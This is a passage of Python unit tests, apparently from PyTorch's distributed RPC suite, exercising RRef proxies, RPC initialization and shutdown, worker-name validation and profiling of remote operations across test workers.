@dist_init
def test_rref_proxy_reuse(self):
rref = rpc.remote(
worker_name((self.rank + 1) % self.world_size),
my_function,
args=(torch.ones(2, 2), 1, 3)
)
expected = torch.ones(2, 2) + 1 + 3
proxy_rpc_sync = rref.rpc_sync()
proxy_rpc_async = rref.rpc_async()
proxy_remote = rref.remote()
self.assertEqual(expected.size(), proxy_rpc_sync.size())
self.assertEqual(expected + 1, proxy_rpc_sync.add(1))
self.assertEqual(expected.view(1, 4), proxy_rpc_sync.view(1, 4))
self.assertEqual(expected.size(), proxy_rpc_async.size().wait())
self.assertEqual(expected + 3, proxy_rpc_async.add(3).wait())
self.assertEqual(expected.view(4, 1), proxy_rpc_async.view(4, 1).wait())
self.assertEqual(expected.size(), proxy_remote.size().to_here())
self.assertEqual(expected + 5, proxy_remote.add(5).to_here())
self.assertEqual(expected.view(-1), proxy_remote.view(-1).to_here())
def _test_rref_proxy_class(self, dst):
rref = rpc.remote(dst, MyClass, args=(7,))
expected = MyClass(7)
self.assertEqual(expected.get_value(), rref.rpc_sync().get_value())
self.assertEqual(expected.get_value(), rref.rpc_async().get_value().wait())
self.assertEqual(expected.get_value(), rref.remote().get_value().to_here())
expected.increment_value(3)
self.assertEqual(None, rref.rpc_sync().increment_value(1))
self.assertEqual(None, rref.rpc_async().increment_value(1).wait())
self.assertEqual(None, rref.remote().increment_value(1).to_here())
self.assertEqual(expected.get_value(), rref.rpc_sync().get_value())
self.assertEqual(expected.get_value(), rref.rpc_async().get_value().wait())
self.assertEqual(expected.get_value(), rref.remote().get_value().to_here())
self.assertEqual(
expected.my_instance_method(2),
rref.rpc_sync().my_instance_method(2)
)
self.assertEqual(
expected.my_instance_method(3),
rref.rpc_async().my_instance_method(3).wait()
)
self.assertEqual(
expected.my_instance_method(4),
rref.remote().my_instance_method(4).to_here()
)
self.assertEqual(
expected.my_static_method(9),
rref.rpc_sync().my_static_method(9)
)
self.assertEqual(
expected.my_static_method(10),
rref.rpc_async().my_static_method(10).wait()
)
self.assertEqual(
expected.my_static_method(11),
rref.remote().my_static_method(11).to_here()
)
self.assertEqual(
expected.my_class_method(2, torch.zeros(2, 2)),
rref.rpc_sync().my_class_method(2, torch.zeros(2, 2))
)
self.assertEqual(
expected.my_class_method(2, torch.ones(3, 3)),
rref.rpc_async().my_class_method(2, torch.ones(3, 3)).wait()
)
self.assertEqual(
expected.my_class_method(2, torch.ones(4, 4)),
rref.remote().my_class_method(2, torch.ones(4, 4)).to_here()
)
@dist_init
def test_rref_proxy_class(self):
self._test_rref_proxy_class(worker_name((self.rank + 1) % self.world_size))
@dist_init
def test_rref_proxy_class_self(self):
self._test_rref_proxy_class(rpc.get_worker_info())
@dist_init
def test_self_remote_rref_as_self_remote_arg(self):
self._test_self_remote_rref_as_remote_arg(rpc.get_worker_info())
@mock.patch.object(torch.distributed.autograd, "_init")
@mock.patch.object(torch.distributed.rpc.api, "_set_and_start_rpc_agent")
@dist_init(setup_rpc=False)
def test_register_rpc_backend_and_set_and_start_rpc_backend(
self, mock_rpc_agent, mock_dist_autograd_init
):
backend_name = "stub_backend"
backend = rpc.backend_registry.register_backend(
backend_name,
_stub_construct_rpc_backend_options_handler,
_stub_init_rpc_backend_handler,
)
with self.assertRaisesRegex(
RuntimeError, "^RPC backend .+: already registered$"
):
backend = rpc.backend_registry.register_backend(
backend_name,
_stub_construct_rpc_backend_options_handler,
_stub_init_rpc_backend_handler,
)
rpc.init_rpc(
name="worker1",
backend=backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
@dist_init(setup_rpc=False)
def test_duplicate_name(self):
with self.assertRaisesRegex(RuntimeError, "is not unique"):
store, _, _ = next(
torch.distributed.rendezvous(
self.init_method, rank=self.rank, world_size=self.world_size
)
)
rpc._init_rpc_backend(
backend=self.rpc_backend,
store=store,
name="duplicate_name",
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
@dist_init(setup_rpc=False)
def test_reinit(self):
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
initialize_pg(self.file_init_method, self.rank, self.world_size)
# Wait for all init to complete.
dist.barrier()
# TODO: with TCP init, rank 0 raises Address already in use because
# rank 0 is the start daemon and the store is created before checking if
# RPC is already initialized in init_rpc.
if os.environ.get("RPC_INIT_WITH_TCP", None) == "1" and self.rank == 0:
expected_reinit_err = "Address already in use"
else:
expected_reinit_err = "is already initialized"
with self.assertRaisesRegex(RuntimeError, expected_reinit_err):
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
rpc.shutdown()
def test_world_size_one(self):
if self.rank == 0:
rpc.init_rpc(
name="me",
backend=self.rpc_backend,
rank=0,
world_size=1,
rpc_backend_options=self.rpc_backend_options,
)
expect = torch.ones(2, 2) * 2
result = rpc.rpc_sync(
"me",
my_tensor_function,
args=(torch.ones(2, 2), torch.ones(2, 2))
)
self.assertEqual(expect, result)
expect = torch.ones(3, 3) * 2
result = rpc.rpc_async(
"me",
my_tensor_function,
args=(torch.ones(3, 3), torch.ones(3, 3))
).wait()
self.assertEqual(expect, result)
expect = torch.ones(4, 4) * 2
result = rpc.remote(
"me",
my_tensor_function,
args=(torch.ones(4, 4), torch.ones(4, 4))
).to_here()
self.assertEqual(expect, result)
rpc.shutdown()
@dist_init(setup_rpc=False)
def test_invalid_names(self):
from torch.distributed.rpc import WorkerInfo
worker_id = 0
with self.assertRaisesRegex(RuntimeError, "Worker name must match"):
info = WorkerInfo("abc*", worker_id)
with self.assertRaisesRegex(RuntimeError, "Worker name must match"):
info = WorkerInfo(" ", worker_id)
with self.assertRaisesRegex(RuntimeError, "must be non-empty"):
info = WorkerInfo("", worker_id)
# If the number in the message does not match, it is likely that the
# value of MAX_NAME_LEN in RPC WorkerInfo has changed.
with self.assertRaisesRegex(RuntimeError, "shorter than 128"):
info = WorkerInfo("".join(["a" for i in range(500)]), worker_id)
@dist_init
def test_add(self):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(
worker_name(dst_rank),
torch.add,
args=(torch.ones(n, n), torch.ones(n, n)),
)
self.assertEqual(ret, torch.ones(n, n) * 2)
@dist_init
def test_add_with_id(self):
n = self.rank + 1
dst_rank = n % self.world_size
        worker_info = rpc.get_worker_info(worker_name(dst_rank))
        ret = rpc.rpc_sync(
            worker_info, torch.add, args=(torch.ones(n, n), torch.ones(n, n))
)
self.assertEqual(ret, torch.ones(n, n) * 2)
@dist_init
def test_scalar_add(self):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(
worker_name(dst_rank), torch.add, args=(torch.ones(n, n), n)
)
self.assertEqual(ret, (torch.ones(n, n) + n))
@dist_init
def test_async_add(self):
n = self.rank + 1
dst_rank = n % self.world_size
fut = rpc.rpc_async(
worker_name(dst_rank),
torch.add,
args=(torch.ones(n, n), torch.ones(n, n)),
)
self.assertEqual(fut.wait(), torch.ones(n, n) * 2)
@dist_init
def test_nonzero(self):
n = self.rank + 1
dst_rank = n % self.world_size
x = torch.ones(self.world_size, self.world_size)
x[self.rank][self.rank] = 0
ret = rpc.rpc_sync(worker_name(dst_rank), torch.nonzero, args=(x,))
self.assertEqual(ret, x.nonzero())
@dist_init
def test_multi_rpc(self):
dst_rank = (self.rank + 1) % self.world_size
for i in range(20):
n = i + self.rank + 1
ret = rpc.rpc_sync(
worker_name(dst_rank),
torch.add,
args=(torch.ones(n, n), torch.ones(n, n)),
)
self.assertEqual(ret, torch.ones(n, n) * 2)
def _run_uneven_workload(self, num_repeat=30):
# worker0 drives and waits for worker1 and worker2
# throughout the test.
if self.rank == 0:
self.assertTrue(self.world_size >= 3)
# Phase 1: Only worker1 has workload.
dst = "worker1"
futs = []
for _ in range(num_repeat):
fut = rpc.rpc_async(dst, heavy_rpc, args=(torch.ones(100, 100),))
futs.append(fut)
for fut in torch.futures.collect_all(futs).wait():
self.assertEqual(fut.wait(), 0)
# Phase 2: Only worker2 has workload.
# If join is not correctly implemented,
# worker2 should be closed by now.
dst = "worker2"
futs = []
for _ in range(num_repeat):
fut = rpc.rpc_async(dst, heavy_rpc, args=(torch.ones(100, 100),))
futs.append(fut)
for val in torch.futures.wait_all(futs):
self.assertEqual(val, 0)
def test_wait_all_workers(self):
rpc.init_rpc(
name="worker%d" % self.rank,
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
self._run_uneven_workload()
# worker0 calls this at the end after waiting for RPC responses.
# worker1/2 calls this immediately and has some works after it.
# worker3 calls this immediately and has no more work.
rpc.api._wait_all_workers()
rpc.shutdown(graceful=False)
def test_wait_all_workers_twice(self):
rpc.init_rpc(
name="worker%d" % self.rank,
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
self._run_uneven_workload()
# worker0 calls this at the end after waiting for RPC responses.
# worker1/2 calls this immediately and has some works after it.
# worker3 calls this immediately and has no more work.
rpc.api._wait_all_workers()
rpc.api._wait_all_workers()
rpc.shutdown(graceful=False)
@dist_init
def test_all_gather(self):
info = rpc.get_worker_info()
results = rpc.api._all_gather(info.id)
expected = {}
for info in rpc._get_current_rpc_agent().get_worker_infos():
expected[info.name] = info.id
self.assertEqual(expected, results)
@dist_init
def test_all_gather_timeout(self):
rpc._set_rpc_timeout(0.1)
if self.rank == 0:
with self.assertRaisesRegex(
RuntimeError,
"timed out in _all_gather after 0\\.10 seconds"
):
rpc.api._all_gather(SlowPickleClass(0.5))
else:
expected_error = self.get_timeout_error_regex()
with self.assertRaisesRegex(RuntimeError, expected_error):
rpc.api._all_gather(SlowPickleClass(0.5))
@dist_init
def test_graceful_shutdown_with_uneven_workload(self):
"""Test graceful termination."""
self._run_uneven_workload()
@dist_init(setup_rpc=False)
def test_shutdown_followed_by_rpc(self):
# Initialize RPC.
rpc.init_rpc(
name="worker%d" % self.rank,
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(
worker_name(dst_rank),
torch.add,
args=(torch.ones(n, n), torch.ones(n, n)),
)
self.assertEqual(ret, torch.ones(n, n) * 2)
rpc.shutdown()
with self.assertRaisesRegex(RuntimeError, "^RPC has not been initialized"):
rpc.rpc_sync(
worker_name(dst_rank),
torch.add,
args=(torch.ones(n, n), torch.ones(n, n)),
)
@dist_init
def test_expected_src(self):
dst_rank = (self.rank + 1) % self.world_size
expected_src_rank = (self.rank - 1) % self.world_size
ret = rpc.rpc_sync(worker_name(dst_rank), set_value, args=(self.rank,))
value = VALUE_FUTURE.result()
self.assertEqual(value, expected_src_rank)
@dist_init
def test_py_built_in(self):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(worker_name(dst_rank), min, args=(n, n + 1, n + 2))
self.assertEqual(ret, min(n, n + 1, n + 2))
@dist_init
def test_py_user_defined(self):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(
worker_name(dst_rank),
my_function,
kwargs={"a": n, "b": n + 1, "c": n + 2},
)
self.assertEqual(ret, my_function(n, n + 1, n + 2))
def test_build_rpc_profiling_key(self):
# Tests that the name that shows up as an Event in profiling RPCs has all
# the necessary information.
for exec_mode in [RPCExecMode.SYNC, RPCExecMode.ASYNC, RPCExecMode.REMOTE]:
rpc_profiling_key = _build_rpc_profiling_key(
exec_mode, "foo", "worker0", "worker1"
)
self.assertIn(exec_mode.value, rpc_profiling_key)
self.assertIn("foo", rpc_profiling_key)
self.assertIn("worker0", rpc_profiling_key)
self.assertIn("worker1", rpc_profiling_key)
def check_profiling_info(self, self_worker_name, dst_worker_name, func, rpc_event, rpc_exec_mode):
self.assertTrue(self_worker_name in rpc_event.name)
self.assertTrue(dst_worker_name in rpc_event.name)
if isinstance(func, torch.jit.ScriptFunction):
self.assertTrue(torch._jit_internal._qualified_name(func) in rpc_event.name)
else:
self.assertTrue(func.__name__ in rpc_event.name)
self.assertTrue(rpc_exec_mode.value in rpc_event.name)
self.assertEqual(rpc_event.count, 1)
@dist_init
def test_profiler_rpc_record_shapes(self):
if self.rank != 1:
return
dst = (self.rank + 1) % self.world_size
dst_worker = worker_name(dst)
t1, t2 = torch.ones(100), torch.ones(100)
with torch.autograd.profiler.profile(record_shapes=True) as prof:
rpc.rpc_sync(dst_worker, torch.add, args=(t1, t2))
function_events = prof.function_events
remote_events = [event for event in function_events if event.is_remote]
remote_add_event = [
event for event in remote_events if "aten::add" in event.name
][0]
remote_add_input_shapes = remote_add_event.input_shapes
# Run profiler on equivalent local op and validate shapes are the same.
with torch.autograd.profiler.profile(record_shapes=True) as prof:
torch.add(t1, t2)
local_function_events = prof.function_events
local_add_event = [
event for event in local_function_events if "aten::add" in event.name
][0]
local_add_input_shapes = local_add_event.input_shapes
self.assertEqual(remote_add_input_shapes, local_add_input_shapes)
@dist_init
def test_profiler_rpc_memory(self):
if self.rank != 1:
return
dst = (self.rank + 1) % self.world_size
dst_worker = worker_name(dst)
with torch.autograd.profiler.profile(profile_memory=True) as p:
fut = rpc.rpc_async(dst_worker, udf_with_torch_ops, args=())
res = fut.wait()
function_events = p.function_events
event_cpu_mem_usages = set(event.cpu_memory_usage for event in function_events)
# if cpu_memory_usage was not propagated over the wire, this set would
# only contain 0 (indicates no memory being profiled)
self.assertNotEqual({0}, event_cpu_mem_usages)
# No memory profiled if profile_memory=False
with torch.autograd.profiler.profile(profile_memory=False) as p:
fut = rpc.rpc_async(dst_worker, udf_with_torch_ops, args=())
res = fut.wait()
function_events = p.function_events
event_cpu_mem_usages = set(event.cpu_memory_usage for event in function_events)
self.assertEqual({0}, event_cpu_mem_usages)
@skip_if_lt_x_gpu(2)
@dist_init
def test_profiler_remote_cuda(self):
if self.rank != 1:
return
dst_cuda_0 = (self.rank + 1) % self.world_size
dst_cuda_1 = (self.rank + 2) % self.world_size
dst_worker_cuda_0 = worker_name(dst_cuda_0)
dst_worker_cuda_1 = worker_name(dst_cuda_1)
with torch.autograd.profiler.profile(use_cuda=True) as p:
fut1 = rpc.rpc_async(dst_worker_cuda_0, udf_with_torch_ops, args=(0, ))
fut2 = rpc.rpc_async(dst_worker_cuda_1, udf_with_torch_ops, args=(1, ))
fut1.wait()
fut2.wait()
def get_name(event):
return event.name[event.name.find(REMOTE_OP_STR) + len(REMOTE_OP_STR):]
function_events = p.function_events
for event in function_events:
if event.is_async:
self.assertEqual(0, event.cuda_time_total)
self.assertEqual([], event.kernels)
self.assertEqual(0, event.cuda_time)
else:
if event.node_id == 1:
continue
self.assertTrue(event.node_id in [dst_cuda_0, dst_cuda_1])
if get_name(event) in EXPECTED_REMOTE_EVENTS:
self.assertGreater(event.cuda_time_total, 0)
self.assertEqual(1, len(event.kernels))
kernel = event.kernels[0]
if event.node_id == dst_cuda_0:
self.assertEqual(kernel.device, 0)
if event.node_id == dst_cuda_1:
self.assertEqual(kernel.device, 1)
self.assertGreater(event.cuda_time, 0)
# Validate that EXPECTED_REMOTE_EVENTS is a subset of remotely profiled
# events.
remote_events = [event for event in function_events if event.is_remote]
remote_event_names = [get_name(event) for event in remote_events if get_name(event) in EXPECTED_REMOTE_EVENTS]
self.assertEqual(set(remote_event_names), set(EXPECTED_REMOTE_EVENTS))
@dist_init
def test_profiler_export_trace(self):
if self.rank != 1:
return
dst = (self.rank + 1) % self.world_size
dst_worker = worker_name(dst)
with torch.autograd.profiler.profile() as p:
fut = rpc.rpc_async(dst_worker, udf_with_torch_ops, args=())
res = fut.wait()
events = p.function_events
with TemporaryFileName() as fname:
path = fname
p.export_chrome_trace(path)
with open(path) as f:
trace = json.load(f)
event_names = [event['name'] for event in trace]
for expected_event_name in EXPECTED_REMOTE_EVENTS + [RPCExecMode.ASYNC.value]:
event_exists = any([expected_event_name in event_name for event_name in event_names])
self.assertTrue(event_exists)
@dist_init
def test_profiler_rpc_key_names(self):
# tests that remote events are properly prefixed with the RPC profiling key.
if self.rank != 1:
return
# Spawn multiple threads that send RPCs to ensure keys are correctly
        # prefixed when there are multiple RPCs being created/in flight at the
# same time.
dst_ranks = [rank for rank in range(0, self.world_size) if rank != self.rank]
def rpc_with_profiling(dst_worker):
with torch.autograd.profiler.profile() as prof:
fut = rpc.rpc_async(dst_worker, udf_with_torch_ops, args=())
fut.wait()
events = prof.function_events
remote_event_names = {
event.name: event for event in events if event.is_remote
}
rpc_profiling_key = _build_rpc_profiling_key(
RPCExecMode.ASYNC,
udf_with_torch_ops.__qualname__,
worker_name(self.rank),
dst_worker,
)
remote_event_name_set = set(EXPECTED_REMOTE_EVENTS)
for name, event in remote_event_names.items():
# Ensure that we have the expected key as part of the remote
# event.
self.assertTrue(name.startswith(rpc_profiling_key))
self.assertTrue(event.is_remote)
self.assertTrue(event.node_id == rpc.get_worker_info(dst_worker).id)
# Ensure that the remote event name also contains the operator.
operator_name_substr = name[len(rpc_profiling_key) :]
# Note: we don't assert that every remote event needs to be
# in the above set, the set is just a representative set of
# what we expect to see. The profiler can change and add more
# events, but we should always expect to see this representative
# set.
matching_event = {
remote_event_name
for remote_event_name in remote_event_name_set
if remote_event_name in operator_name_substr
}
remote_event_name_set -= matching_event
# The set should be empty, otherwise its contained elements did
# not show up in the remote profiler output.
self.assertTrue(
remote_event_name_set == set(),
f"Expected {remote_event_name_set} to be included in remote profiler output.",
)
for dst in dst_ranks:
dst_worker = worker_name(dst)
num_parallel_rpcs = 2
with concurrent.futures.ThreadPoolExecutor(
max_workers=num_parallel_rpcs
) as executor:
futs = [
executor.submit(rpc_with_profiling, dst_worker)
for _ in range(num_parallel_rpcs)
]
# Wait for workers to finish test
for fut in futs:
fut.result()
def _run_test_profiler_remote_events_profiled(self):
# Tests that we can successfully invoke the profiler on a remote node,
# and collect the remote events back in the local profiler.
if self.rank != 1:
return
dst_ranks = [rank for rank in range(0, self.world_size) if rank != self.rank]
for dst in dst_ranks:
dst_worker = worker_name(dst)
with torch.autograd.profiler.profile() as prof:
fut = rpc.rpc_async(dst_worker, udf_with_torch_ops, args=())
ret = fut.wait()
events = prof.function_events
rpc_event = get_function_event(events, RPCExecMode.ASYNC.value)
self.check_profiling_info(
worker_name(self.rank),
dst_worker,
udf_with_torch_ops,
rpc_event,
RPCExecMode.ASYNC,
)
remote_events = {event.name: event for event in events if event.is_remote}
rpc_profiling_key = _build_rpc_profiling_key(
RPCExecMode.ASYNC,
udf_with_torch_ops.__qualname__,
worker_name(self.rank),
worker_name(dst),
)
for expected_remote_event_name in EXPECTED_REMOTE_EVENTS:
expected_key = rpc_profiling_key + REMOTE_OP_STR + expected_remote_event_name
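# e.g. the remote 'aten::add' op is expected under the key
# rpc_profiling_key + REMOTE_OP_STR + 'aten::add'; REMOTE_OP_STR separates the
# RPC profiling prefix from the remote operator name.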
self.assertTrue(expected_key in remote_events)
remote_event = remote_events[expected_key]
# Remote event should have a node ID corresponding to the worker
# it ran on.
self.assertEqual(remote_event.node_id, dst)
# Validate the order in which remote events show up in the profiling output.
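# convert_remote_to_local strips everything up to and including the
# '<rpc profiling key> + REMOTE_OP_STR' prefix, leaving just the local
# operator name so it can be compared against EXPECTED_REMOTE_EVENTS.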
def convert_remote_to_local(event_name):
remote_op_key = rpc_profiling_key + REMOTE_OP_STR
return event_name[
event_name.find(remote_op_key)
+ len(remote_op_key) :
]
remote_events_list = [
convert_remote_to_local(event.name)
for event in events
if convert_remote_to_local(event.name) in EXPECTED_REMOTE_EVENTS
]
self.assertEqual(remote_events_list, EXPECTED_REMOTE_EVENTS)
@dist_init
def test_profiler_remote_events_profiled(self):
self._run_test_profiler_remote_events_profiled()
@single_threaded_process_group_agent
@dist_init
def test_profiler_remote_events_profiled_single_threaded(self):
self._run_test_profiler_remote_events_profiled()
def run_profiling_workload(self, dst):
fut = rpc.rpc_async(
worker_name(dst),
torch.mul,
args=(
torch.tensor(1.0, requires_grad=True),
torch.tensor(1.0, requires_grad=True),
),
)
fut.wait()
def _run_rpc_profiling_async_function(self, device="cpu"):
if self.rank != 1:
return
dst1 = worker_name((self.rank + 1) % self.world_size)
dst2 = worker_name((self.rank + 2) % self.world_size)
x = torch.ones(2)
y = torch.ones(2)
with torch.autograd.profiler.profile() as prof:
ret = rpc.rpc_async(
dst1, slow_async_add, args=(dst2, x, y, device), timeout=20
)
out = ret.wait()
function_events = prof.function_events
# slow_async_add resulted in an RPC from dst1 -> dst2, so this should be
# recorded.
key_prefix = _build_rpc_profiling_key(
RPCExecMode.ASYNC, slow_async_add.__qualname__, worker_name(self.rank), dst1
)
nested_rpc_key_prefix = _build_rpc_profiling_key(
RPCExecMode.ASYNC, slow_add.__qualname__, dst1, dst2
)
expected_key = key_prefix + REMOTE_OP_STR + nested_rpc_key_prefix
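# Nested RPC keys are chained with REMOTE_OP_STR: the event for the
# dst1 -> dst2 RPC issued inside slow_async_add is recorded under the outer
# key's prefix followed by the inner RPC's own profiling key.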
remote_events = [event for event in function_events if event.is_remote]
rpc_remote_event = [
event for event in remote_events if event.name == expected_key
]
self.assertEqual(1, len(rpc_remote_event))
rpc_remote_event = rpc_remote_event[0]
self.assertEqual(rpc_remote_event.node_id, (self.rank + 1) % self.world_size)
# slow_async_add's RPC does an add on dst2, which should be reflected as well.
remote_add_key = (
expected_key + REMOTE_OP_STR + torch.jit._builtins._find_builtin(torch.add)
)
remote_add_event = [
event for event in remote_events if event.name == remote_add_key
]
self.assertEqual(1, len(remote_add_event))
remote_add_event = remote_add_event[0]
# Validate that node_id is dst2.
self.assertEqual(remote_add_event.node_id, (self.rank + 2) % self.world_size)
@dist_init
def test_rpc_profiling_async_function(self):
initialize_pg(self.file_init_method, self.rank, self.world_size)
self._run_rpc_profiling_async_function()
if torch.cuda.is_available():
dist.barrier()
self._run_rpc_profiling_async_function(device="cuda:0")
@single_threaded_process_group_agent
@dist_init
def test_rpc_profiling_async_function_single_threaded(self):
initialize_pg(self.file_init_method, self.rank, self.world_size)
self._run_rpc_profiling_async_function()
if torch.cuda.is_available():
dist.barrier()
self._run_rpc_profiling_async_function(device="cuda:0")
@dist_init
def test_rpc_profiling_remote_record_function(self):
# test that functions run over RPC with record_function show the expected
# profiled block.
if self.rank != 1:
return
dst_ranks = [i for i in range(self.world_size) if i != self.rank]
for dst_rank in dst_ranks:
dst_worker = worker_name(dst_rank)
with torch.autograd.profiler.profile() as prof:
fut = rpc.rpc_async(dst_worker, udf_with_torch_ops, args=(-1, True))
fut.wait()
function_events = prof.function_events
record_function_remote_event = [
evt for evt in function_events if "##forward##" in evt.name
]
self.assertEqual(1, len(record_function_remote_event))
record_function_remote_event = record_function_remote_event[0]
self.assertEqual(record_function_remote_event.node_id, dst_rank)
remaining_remote_events = {
evt for evt in function_events if evt.node_id == dst_rank
} - {record_function_remote_event}
# These ops are created by the hack of casting record_function to a
# tensor, so they should not count in the actual UDF profiled time.
# TODO remove after https://github.com/pytorch/pytorch/issues/43868
# is resolved.
remote_events_denylist = [
"aten::zeros",
"aten::empty",
"aten::zero_",
"aten::fill_",
]
REMOTE_OP_STR = "#remote_op: "
def convert_remote_to_local(event_name):
remote_op_key = REMOTE_OP_STR
return event_name[event_name.find(remote_op_key) + len(remote_op_key) :]
# Ideally, we should validate that the sum of remote operations within
# record_function are less than record_function's CPU time. However,
# there is a known bug in profiling
# (https://github.com/pytorch/pytorch/issues/45160) due to which we
# can't do this. So, we just validate they are child events.
prof.key_averages()
# cpu_children only returns direct children, so here we get all
# children recursively.
def get_cpu_children(event):
if not event.cpu_children:
return []
# Copy the list so that extending it below does not mutate the profiler's
# event tree or the list we are iterating over.
cpu_children = list(event.cpu_children)
for e in event.cpu_children:
cpu_children.extend(get_cpu_children(e))
return cpu_children
record_function_children_names = [
convert_remote_to_local(c.name)
for c in get_cpu_children(record_function_remote_event)
]
for evt in remaining_remote_events:
local_name = convert_remote_to_local(evt.name)
if local_name not in remote_events_denylist:
self.assertTrue(
local_name in record_function_children_names,
f"{local_name} not in {record_function_children_names}",
)
def validate_profiling_workload(self, dst, prof):
def convert_remote_to_local(event_name):
return event_name[event_name.find(REMOTE_OP_STR) + len(REMOTE_OP_STR) :]
events = prof.function_events
remote_events = {
convert_remote_to_local(event.name): event
for event in events
if event.is_remote
}
self.assertTrue("aten::mul" in remote_events)
remote_mul_event = remote_events["aten::mul"]
self.assertEqual(remote_mul_event.node_id, dst)
self.check_profiling_info(
worker_name(self.rank),
worker_name(dst),
torch.mul,
remote_mul_event,
RPCExecMode.ASYNC,
)
def _run_test_profiler_with_autograd_context(self):
dst = (self.rank + 1) % self.world_size
if self.rank == 1:
# Cases where we can double wrap messages with profiling information and autograd info.
with dist_autograd.context() as context_id:
with torch.autograd.profiler.profile() as prof:
self.run_profiling_workload(dst)
self.validate_profiling_workload(dst, prof)
# Ensure that flipped order of ctx managers results in events being
# recorded as expected.
with torch.autograd.profiler.profile() as prof:
with dist_autograd.context() as context_id:
self.run_profiling_workload(dst)
self.validate_profiling_workload(dst, prof)
@single_threaded_process_group_agent
@dist_init
def test_profiler_with_autograd_context_single_threaded(self):
self._run_test_profiler_with_autograd_context()
@dist_init
def test_profiler_with_autograd_context(self):
self._run_test_profiler_with_autograd_context()
def _profiler_test_with_rpc(self, rpc_exec_mode, func, args, use_record_function=False, dst=None):
dst = dst if dst is not None else (self.rank + 1) % self.world_size
# only run profiler on rank 1.
if self.rank == 1:
with torch.autograd.profiler.profile() as prof:
record_function_ctx_mgr = (
contextlib.suppress()
if not use_record_function
else torch.autograd.profiler.record_function(
"foo"
)
)
with record_function_ctx_mgr as rf:
if rpc_exec_mode == RPCExecMode.SYNC:
rpc.rpc_sync(worker_name(dst), func, args=args)
elif rpc_exec_mode == RPCExecMode.ASYNC:
fut = rpc.rpc_async(worker_name(dst), func, args=args)
fut.wait()
else:
self.assertTrue(rpc_exec_mode == RPCExecMode.REMOTE)
rref = rpc.remote(worker_name(dst), func, args=args)
rref.to_here()
# To avoid flakiness, wait for the RRef to be profiled. This
# means that we received the acknowledgement of successful
# creation on the owner and ran the callbacks responsible
# for recording the profiling event.
rref._get_profiling_future().wait()
events = prof.function_events
rpc_event = get_function_event(events, rpc_exec_mode.value)
# verify Node ID for this rpc event.
self.assertEqual(rpc_event.node_id, self.rank)
# Ensure recording of remote events.
remote_events = {event for event in events if event.node_id == dst} - {rpc_event}
self.assertGreaterEqual(len(remote_events), 1)
for remote_event in remote_events:
self.assertEqual(remote_event.node_id, dst)
if use_record_function:
scope_event = get_function_event(events, "foo")
# Since RPC call is within the scope, its CPU interval should be
# contained within foo's interval.
self.assertTrue(scope_event.time_range.start < rpc_event.time_range.start)
self.assertTrue(scope_event.time_range.end > rpc_event.time_range.end)
# the sender, dest worker, function run, and type of RPC should all
# be recorded.
self_worker_name = worker_name(self.rank)
dst_worker_name = worker_name(dst)
self.check_profiling_info(self_worker_name, dst_worker_name, func, rpc_event, rpc_exec_mode)
if use_record_function:
# verify order by ensuring that the outer context comes
# before the rpc event.
foo_event_idx = next(i for i, event in enumerate(events) if "foo" in event.name)
rpc_event_idx = next(i for i, event in enumerate(events) if rpc_exec_mode.value in event.name)
self.assertLess(foo_event_idx, rpc_event_idx)
def _run_test_profiler_with_sync_rpc_udf(self):
self._profiler_test_with_rpc(RPCExecMode.SYNC, my_sleep_func, args=(1,))
self._profiler_test_with_rpc(RPCExecMode.SYNC, my_sleep_func, args=(1,),
use_record_function=True)
@dist_init
def test_profiler_with_sync_rpc_udf(self):
self._run_test_profiler_with_sync_rpc_udf()
@single_threaded_process_group_agent
@dist_init
def test_profiler_with_sync_rpc_udf_single_threaded(self):
self._run_test_profiler_with_sync_rpc_udf()
def _run_test_profiler_with_sync_rpc_builtin(self):
self._profiler_test_with_rpc(
RPCExecMode.SYNC, torch.mul, args=(torch.ones(1), torch.ones(1))
)
self._profiler_test_with_rpc(
RPCExecMode.SYNC, torch.mul, args=(torch.ones(1), torch.ones(1)),
use_record_function=True
)
@dist_init
def test_profiler_with_sync_rpc_builtin(self):
self._run_test_profiler_with_sync_rpc_builtin()
@single_threaded_process_group_agent
@dist_init
def test_profiler_with_sync_rpc_builtin_single_threaded(self):
self._run_test_profiler_with_sync_rpc_builtin()
def _run_test_profiler_with_async_rpc_udf(self):
self._profiler_test_with_rpc(RPCExecMode.ASYNC, my_sleep_func, args=(1,))
self._profiler_test_with_rpc(RPCExecMode.ASYNC, my_sleep_func, args=(1,),
use_record_function=True)
@dist_init
def test_profiler_with_async_rpc_udf(self):
self._run_test_profiler_with_async_rpc_udf()
@single_threaded_process_group_agent
@dist_init
def test_profiler_with_async_rpc_udf_single_threaded(self):
self._run_test_profiler_with_async_rpc_udf()
def _run_test_profiler_with_async_rpc_builtin(self):
self._profiler_test_with_rpc(
RPCExecMode.ASYNC, torch.mul, args=(torch.ones(1), torch.ones(1))
)
self._profiler_test_with_rpc(
RPCExecMode.ASYNC, torch.mul, args=(torch.ones(1), torch.ones(1)),
use_record_function=True
)
@dist_init
def test_profiler_with_async_rpc_builtin(self):
self._run_test_profiler_with_async_rpc_builtin()
@single_threaded_process_group_agent
@dist_init
def test_profiler_with_async_rpc_builtin_single_threaded(self):
self._run_test_profiler_with_async_rpc_builtin()
def _run_test_profiler_with_remote_udf(self):
self._profiler_test_with_rpc(RPCExecMode.REMOTE, my_sleep_func, args=(1,))
self._profiler_test_with_rpc(
RPCExecMode.REMOTE, my_sleep_func, args=(1,), use_record_function=True
)
# test remote to self
self._profiler_test_with_rpc(
RPCExecMode.REMOTE, my_sleep_func, args=(1,), dst=self.rank
